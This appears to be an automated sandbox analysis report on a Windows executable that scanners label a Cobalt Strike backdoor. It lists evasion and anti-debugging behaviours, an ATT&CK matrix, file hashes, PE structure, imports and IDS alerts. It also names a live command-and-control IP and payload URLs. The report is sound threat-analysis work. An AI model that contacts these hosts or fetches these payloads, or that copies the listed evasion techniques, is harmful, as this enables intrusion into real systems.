            Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49927
            Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49928
            Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49929
            Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49930
            Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49931
            Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49932
            Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49933
            Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49934
            Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49935
            Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49936
            Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49937
            Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49938
            Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49939
            Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 10001
            Source: unknownNetwork traffic detected: HTTP traffic on port 10001 -> 49940
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exeCode function: 0_2_009AC148 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_009AC148

            Malware Analysis System Evasion

            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_0099F5C8
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009A3F88
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Window / User API: threadDelayed 1705
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Window / User API: threadDelayed 8071
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Evasive API call chain: GetLocalTime,DecisionNodes (graph_0-30515)
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, API coverage: 7.6 %
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7016, Thread sleep count: 1705 > 30
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7016, Thread sleep time: -17050000s >= -30000s
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7044, Thread sleep time: -60000s >= -30000s
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7016, Thread sleep count: 8071 > 30
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe TID: 7016, Thread sleep time: -80710000s >= -30000s
            Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Last function: Thread delayed
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009A0ED4 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009A779C malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Thread delayed: delay time: 60000
            Source: 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000171000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAWr
            Source: 7kSftA4Eoh.exe, 00000000.00000003.2497560445.000000000012E000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.000000000012E000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000002.4125449731.000000000010A000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2497560445.0000000000171000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2357156436.000000000012F000.00000004.00000020.00020000.00000000.sdmp, 7kSftA4Eoh.exe, 00000000.00000003.2791907620.0000000000171000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, API call chain: ExitProcess graph end node (graph_0-30589)

            Anti Debugging

            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Debugger detection routine: QueryPerformanceCounter, DebugActiveProcess, DecisionNodes, ExitProcess or Sleep (graph_0-30291)
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Process Stats: CPU usage > 42% for more than 60s
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009B4014 IsDebuggerPresent,__crtUnhandledException
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009B4C34 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009BC124 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,FreeLibrary,LoadLibraryExW,GetLastError,LoadLibraryExW
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009ADA80 GetProcessHeap
            Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_00401180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_00402F69 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_00401A70 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_004092E4 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009B0270 SetUnhandledExceptionFilter,UnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009BE4E8 SetUnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: Yara match, File source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTR
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009AA7DC LogonUserA,GetLastError,ImpersonateLoggedOnUser,GetLastError
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009BE050 AllocateAndInitializeSid
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_00401630 CreateNamedPipeA,ConnectNamedPipe,WriteFile,CloseHandle
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_00401990 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009A455C GetUserNameA,GetComputerNameA,GetModuleFileNameA,strrchr,GetVersionExA,GetProcAddress,GetModuleHandleA,GetProcAddress,_snprintf
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Remote Access Functionality

            Source: Yara match, File source: Process Memory Space: 7kSftA4Eoh.exe PID: 6992, type: MEMORYSTR
            Source: Yara match, File source: 0.2.7kSftA4Eoh.exe.990000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 0.2.7kSftA4Eoh.exe.990000.1.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000000.00000002.4126310737.00000000009F0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.4125434545.00000000000D0000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.4126576684.0000000003540000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000000.00000002.4126095831.0000000000990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009A50E0 socket,htons,ioctlsocket,closesocket,bind,listen
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009A4CD8 htonl,htons,socket,closesocket,bind,ioctlsocket
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009BE628 bind
            Source: C:\Users\user\Desktop\7kSftA4Eoh.exe, Code function: 0_2_009AAF84 socket,closesocket,htons,bind,listen
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 2 Valid Accounts | 2 Valid Accounts | 2 Valid Accounts | OS Credential Dumping | 1 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 21 Access Token Manipulation | 212 Virtualization/Sandbox Evasion | LSASS Memory | 341 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 11 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 Process Injection | 21 Access Token Manipulation | Security Account Manager | 212 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 DLL Side-Loading | 1 Process Injection | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 1 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 111 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 1 Account Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 System Owner/User Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 1 File and Directory Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | HTML Smuggling | /etc/passwd and /etc/shadow | 4 System Information Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement


            Source | Detection | Scanner | Label | Link
            7kSftA4Eoh.exe | 89% | ReversingLabs | Win64.Backdoor.CobaltStrike |
            7kSftA4Eoh.exe | 79% | Virustotal | | Browse
            7kSftA4Eoh.exe | 100% | Avira | HEUR/AGEN.1345031 |
            7kSftA4Eoh.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://8.130.42.227:10001/en_US/all.js | 4% | Virustotal | | Browse
            http://8.130.42.227:10001/2yMe | 6% | Virustotal | | Browse
            No contacted domains info
            Name | Malicious | Antivirus Detection | Reputation
            http://8.130.42.227:10001/en_US/all.js | true | | unknown
            http://8.130.42.227/2yMe | true | | unknown
            http://8.130.42.227:10001/2yMe | true | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
                                                                IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                                8.130.42.227 | unknown | Singapore | | 37963 | CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd | true
                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1523188
                                                                Start date and time:2024-10-01 09:16:05 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 6m 15s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:5
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:7kSftA4Eoh.exe
                                                                renamed because original name is a hash value
                                                                Original Sample Name:71f8b8789a4b0ac3f057f1468579fc23.exe
                                                                Detection:MAL
                                                                Classification:mal100.troj.evad.winEXE@1/0@0/1
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 20
                                                                • Number of non-executed functions: 147
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .exe
                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                Time | Type | Description
                                                                03:16:57 | API Interceptor | 14526524x Sleep call for process: 7kSftA4Eoh.exe modified
                                                                No context
                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                No context
                                                                No created / dropped files found
                                                                File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                Entropy (8bit):5.225476561531618
                                                                TrID:
                                                                • Win64 Executable (generic) (12005/4) 74.80%
                                                                • Generic Win/DOS Executable (2004/3) 12.49%
                                                                • DOS Executable Generic (2002/1) 12.47%
                                                                • VXD Driver (31/22) 0.19%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                                                File name:7kSftA4Eoh.exe
                                                                File size:19'456 bytes
                                                                MD5:71f8b8789a4b0ac3f057f1468579fc23
                                                                SHA1:2f424692dcfb5f9fe87f1e94fd2922ab3fb2143d
                                                                SHA256:a390b03e67b809b3dd08b840e3e917eb701387309c5a8859438dc926ce62ec64
                                                                SHA512:b84f80a40a2b8a7fdb897548028df92119f7fcdfd5ed4f1f4046420886dbfb5443fa4b04ac8dd9fcb05a3daaeb0fa5f12a157240d5597ae2faaf6d2bc020e0a2
                                                                SSDEEP:192:XV7qaCF6Op1t2dobVXujRDcBaXWQjwOT/2oH3pWF8qa1Dojjgi:BqaCF31cix+Dc4zjz30FF46gi
                                                                TLSH:CD92E93FE71358E9C106D57845FB3733DCB239B385E6A72E1734D2B42E105A42EAAA14
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."...H................@............................................... ............................
                                                                Icon Hash:90cececece8e8eb0
                                                                Entrypoint:0x4014c0
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                                                DLL Characteristics:
                                                                Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                TLS Callbacks:0x401ba0
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:147442e63270e287ed57d33257638324
                                                                Instruction
                                                                arpl word ptr [00002AC2h], ax
                                                                test eax, eax
                                                                jle 00007FB8792BBEA8h
                                                                cmp dword ptr [00002ABBh], 00000000h
                                                                jle 00007FB8792BBE9Fh
                                                                dec eax
                                                                mov edx, dword ptr [00007CFEh]
                                                                dec eax
                                                                mov dword ptr [ecx+eax], edx
                                                                dec eax
                                                                mov edx, dword ptr [00007CFBh]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x9000 | 0x8d8 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x6000 | 0x2b8 | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x5060 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9224 | 0x1e8 | .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x20a8 | 0x2200 | 3040ba596609d0f7ba50ac030468b13e | False | 0.5708869485294118 | data | 5.9208685532060095 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0x4000 | 0x4f0 | 0x600 | ebbe6bb0570cd55650f05db1b274f904 | False | 0.6516927083333334 | dBase III DBT, version number 0, next free block index 10, 1st item "*n\032G\236\254N\220\351\330\360|\244\252\210N\246\275\313{\373\370\350`\273\261\311c\240\367\220!\361\370\215l\256\265\325n\265\261\307c\244\343\205B\222\221\340/\370\366\2254\341\217\314a\245\267\322|\341\226\361/\367\366\2244\341\217\352X\367\354\236/\225\252\314k\244\266\321 \364\366\2254\341\226\365?\367\361\250\005\301&T\032`\217\320\270H2\244j\256\257\007z\177\004\003&\360\345\357\215\206T\232" | 5.844254602958452 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0x5000 | 0x910 | 0xa00 | b02c91451e7abad85f4a5bbe48fd6333 | False | 0.2421875 | data | 4.472912660223878 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.pdata | 0x6000 | 0x2b8 | 0x400 | ad5ec754cf0e204a3a3c39436081f3bc | False | 0.380859375 | data | 2.9668653207491333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.xdata | 0x7000 | 0x238 | 0x400 | 6ce9e303fb86766d702ecb2b174cf348 | False | 0.2578125 | data | 2.6337753778508075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss | 0x8000 | 0x9d0 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x9000 | 0x8d8 | 0xa00 | ec8dedb62953693cf02784f71f75d547 | False | 0.323828125 | data | 3.7083607069283806 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0xa000 | 0x68 | 0x200 | 52d79e9aecf5d5c3145d3ec54aa197a8 | False | 0.0703125 | data | 0.2709192282599745 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xb000 | 0x10 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

DLL | Import
KERNEL32.dll | CloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
msvcrt.dll | __C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-01T09:16:59.037379+0200 | 2035442 | ET MALWARE Successful Cobalt Strike Shellcode Download (x64) M1 | 1 | 8.130.42.227 | 10001 | 192.168.2.4 | 49730 | TCP
2024-10-01T09:17:00.947197+0200 | 2033713 | ET MALWARE Cobalt Strike Beacon Observed | 1 | 192.168.2.4 | 49731 | 8.130.42.227 | 10001 | TCP
                                                                2024-10-01T09:19:30.316787+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498658.130.42.22710001TCP
                                                                2024-10-01T09:19:31.392561+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498668.130.42.22710001TCP
                                                                2024-10-01T09:19:32.464935+02002033713ET MALWARE Cobalt Strike Beacon Observed1192.168.2.4498678.130.42.22710001TCP
